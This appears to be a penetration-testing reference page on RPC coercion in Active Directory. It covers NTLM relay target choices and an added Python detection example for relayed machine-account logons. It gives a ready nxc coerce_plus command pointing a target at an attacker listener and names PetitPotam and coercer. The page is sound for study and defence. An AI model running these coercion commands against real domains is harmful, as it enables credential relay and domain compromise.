
RPC Coercion

Coercion forces a Windows host to authenticate to an NTLM relay listener. The authenticating identity is usually the target's machine account (e.g., SERVER$), unless the coerced service runs under a domain service account.

  • Typical targets:
    • DCs (for AD CS/LDAPS relay)
    • Servers
    • Workstations
  • SMB relay to DCs fails by default because DCs require SMB signing. Prefer LDAPS or AD CS as relay targets.
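From the defender's side, the tell-tale of a successful coercion-plus-relay is the target's machine account (SERVER$) authenticating over NTLM from an address that is not SERVER. The following is an added detection example, not code from the original page; the 4624 event records and the `HOST_IPS` inventory map are constructed sample data.

```python
# Added example (not part of the original page): flag Windows Security
# 4624 events that look like a relayed machine-account authentication,
# i.e. an NTLM network logon (LogonType 3) by a machine account whose
# source IP is not the host that account belongs to.

HOST_IPS = {"SERVER": "10.0.0.20", "DC01": "10.0.0.10"}  # assumed inventory lookup

SAMPLE_EVENTS = [  # constructed sample events
    # normal: SERVER$ authenticates from its own address
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "SERVER$", "IpAddress": "10.0.0.20"},
    # suspicious: SERVER$ NTLM logon sourced from an address that is not SERVER
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "SERVER$", "IpAddress": "10.0.0.99"},
    # Kerberos authentication cannot be relayed this way; ignored
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "SERVER$", "IpAddress": "10.0.0.99"},
    # interactive logon by a user, not a machine account; ignored
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "IpAddress": "10.0.0.50"},
]


def is_machine_account(name: str) -> bool:
    """Machine accounts are distinguished by the trailing '$'."""
    return name.endswith("$")


def suspicious_machine_ntlm_logons(events, host_ips):
    """Return (account, source_ip) pairs for NTLM network logons by a
    machine account whose source IP differs from the account's own host.
    Accounts missing from the inventory are skipped rather than flagged."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
            continue
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue
        account = ev.get("TargetUserName", "")
        if not is_machine_account(account):
            continue
        expected_ip = host_ips.get(account.rstrip("$").upper())
        src = ev.get("IpAddress")
        if expected_ip is not None and src != expected_ip:
            hits.append((account, src))
    return hits


if __name__ == "__main__":
    for account, src in suspicious_machine_ntlm_logons(SAMPLE_EVENTS, HOST_IPS):
        print(f"possible relayed coercion: {account} via NTLM from {src}")
```

Run it against 4624 events collected on the relay targets (DCs, AD CS hosts) rather than on the coerced host, since that is where the relayed authentication lands.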

Tools

nxc coerce_plus

Attempts coercion against a variety of RPC interfaces.

nxc smb <smb_server_to_coerce> -u <username> -p <password> -d <domain> -M coerce_plus -o LISTENER=<attacker_ip>

PetitPotam

Attempts coercion against a hardcoded set of EFSRPC interfaces.

coercer scan

Only attempts RPC interfaces advertised by the Endpoint Mapper (EPM).

coercer fuzz

Checks coercion against every known RPC interface.

Attack Paths - If coercion is successful